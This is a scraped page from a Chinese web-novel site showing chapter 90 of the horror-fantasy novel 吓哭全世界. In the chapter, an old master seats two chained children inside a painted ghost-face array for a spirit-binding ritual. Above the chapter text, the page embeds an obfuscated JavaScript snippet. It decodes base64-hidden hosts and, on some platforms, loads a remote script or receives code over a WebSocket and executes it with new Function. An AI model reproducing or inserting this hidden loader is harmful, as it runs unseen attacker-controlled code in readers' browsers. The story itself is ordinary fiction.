笔趣阁

字:
关灯 护眼
笔趣阁 > 吓哭全世界 > 第90章 仪式开始
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第90章 仪式开始

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
夜晚,十一点。
  梭罗树公墓。
  皎白的月光洒在大片竹林中,静谧,幽寂,显得格外安宁,仿佛远离了城市嘈杂的喧嚣,身处于幽静的深山老林。
  竹林中的一片空地,土地干燥,铺着一些碎石子。
  上面不知道用什么黑色的颜料,勾勒出一幅奇异的阵法图案。
  图案呈现圆形,其中描绘着各种诡异的线条,组成一道狰狞恐怖,青面獠牙的鬼面。
  这鬼面拥有两张面孔,左右两边分别为不一样的面貌。
  左半张脸是怒目圆睁,怒发冲冠的狰狞男性面孔。
  而右边则是披头散发,冷漠无比,眼神几乎要凝结成冰的冷漠女性面容。
  就在这诡异的阵法图案中,端坐着两个十三四岁的孩子。
  正是老李头不知从哪里带回来的姐弟俩,江灵与江晨。
  姐弟俩各自占据了鬼面的半边面孔,坐在眼睛的位置。
  他们的双手双脚,还被捆着一圈圈的粗大黑色锁链。
  这些锁链上贴满了黄底红字的道家符箓,一直延伸至远处一棵几人无法环抱的大树,栓死在了上面。
  哗啦……
  少年江晨眨了眨眼睛,似乎是被沙子迷了眼,想要抬手揉揉眼睛。
  然而手臂上缠绕的斑驳铁索,让他根本就无法自如的活动,低垂着双手太过沉重,根本就无法抬起。
  再三尝试下,江晨发现自己完全无法动弹,只好作罢。
  忽然,旁边传来苍老且严厉的声音。
  “子时已到,不要乱动了!”
  老李头从竹林中走出,踱步而来。
  他的身后,还跟着双手环抱一个木质大箱子的陈影。
  “师父…!”江晨与江灵同时怯怯的喊道。
  这两人如今已经拜了老李头为师,算是正式的师徒关系。
  只不过老李头此人虽然平日里吊儿郎当,童心不泯,但是真正的教起本事来,却是非常严格且严厉的。
  两人几天相处下来,都有些惧怕这个严肃的老头子。
  老李头走到了鬼面图案的额头处站定,让两人背对着坐好,而后他也缓缓盘膝坐下。
  三个人呈现三角形,在额头与双眼,各占一处位置。
  陈影抱着大箱子走到老李头身后不远处,轰隆一声,将木质箱子给放在了地上。
  这箱子看起来非常的沉重,只是放在地上,就让干燥的砂石土地都微微塌陷。
  这时,老李头盘算了一下时间,对着旁边站着待命的陈影说道:“开始吧。”
  陈影明显微微一愣,随后有些迟疑问:“不等等杨玄吗?”
  “已经来了。”老李头语气笃定,淡淡说道。
  “啊?”陈影眼睛一瞪。
  突然,竹林不远处就响起了沉稳有力的脚步声。
  很快,杨玄魁梧伟岸的身姿,就出现在了几人的视线里。
  “咦,这么大阵仗?”杨玄看着地面阵法,与几人严肃的表情,感觉氛围有些凝重。
  与前方望过来的陈影对视一眼,微微点头示意后,他走到了阵法前。
  本以为所谓的纳灵只是捕捉几只强力的邪祟,然后通过某种手段给塞到御灵者的体内,强行控制起来。
  没想到此时到来,却是另外一幅景象。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师